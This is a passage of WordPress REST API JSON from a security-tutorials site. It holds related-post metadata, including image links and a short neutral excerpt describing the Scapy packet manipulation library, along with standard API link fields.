security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhjE_C9ZYIWYc35Gzm4MBUZDn2OErBeNr1K-ZhJ-urodkWA6YCx70AOGZZ-9S0MOC92e4SDyEchljq68yrZZyEhgUZR7a0O-3Du5WVZImPaFGBGZJ0wUonNGobsgtzkwLElGWIVVOlNmJLx27cvyt-kT5ShuggF4G_NPkVO3fgdQ7ZnZOlXcElhHNOu1g\/s16000\/CEH.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhjE_C9ZYIWYc35Gzm4MBUZDn2OErBeNr1K-ZhJ-urodkWA6YCx70AOGZZ-9S0MOC92e4SDyEchljq68yrZZyEhgUZR7a0O-3Du5WVZImPaFGBGZJ0wUonNGobsgtzkwLElGWIVVOlNmJLx27cvyt-kT5ShuggF4G_NPkVO3fgdQ7ZnZOlXcElhHNOu1g\/s16000\/CEH.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhjE_C9ZYIWYc35Gzm4MBUZDn2OErBeNr1K-ZhJ-urodkWA6YCx70AOGZZ-9S0MOC92e4SDyEchljq68yrZZyEhgUZR7a0O-3Du5WVZImPaFGBGZJ0wUonNGobsgtzkwLElGWIVVOlNmJLx27cvyt-kT5ShuggF4G_NPkVO3fgdQ7ZnZOlXcElhHNOu1g\/s16000\/CEH.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhjE_C9ZYIWYc35Gzm4MBUZDn2OErBeNr1K-ZhJ-urodkWA6YCx70AOGZZ-9S0MOC92e4SDyEchljq68yrZZyEhgUZR7a0O-3Du5WVZImPaFGBGZJ0wUonNGobsgtzkwLElGWIVVOlNmJLx27cvyt-kT5ShuggF4G_NPkVO3fgdQ7ZnZOlXcElhHNOu1g\/s16000\/CEH.webp?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":5565,"url":"https:\/\/kalilinuxtutorials.com\/scapy-interactive-packet-manipulation\/","url_meta":{"origin":5536,"position":5},"title":"Scapy : Python-Based Interactive Packet Manipulation Program &#038; Library","author":"R K","date":"July 1, 2019","format":false,"excerpt":"Scapy is a powerful Python-based interactive packet manipulation program and library. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, store or read them using pcap files, match requests and replies, and much more. It is designed to\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/5536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=5536"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/5536\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/15640"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=5536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=5536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=5536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}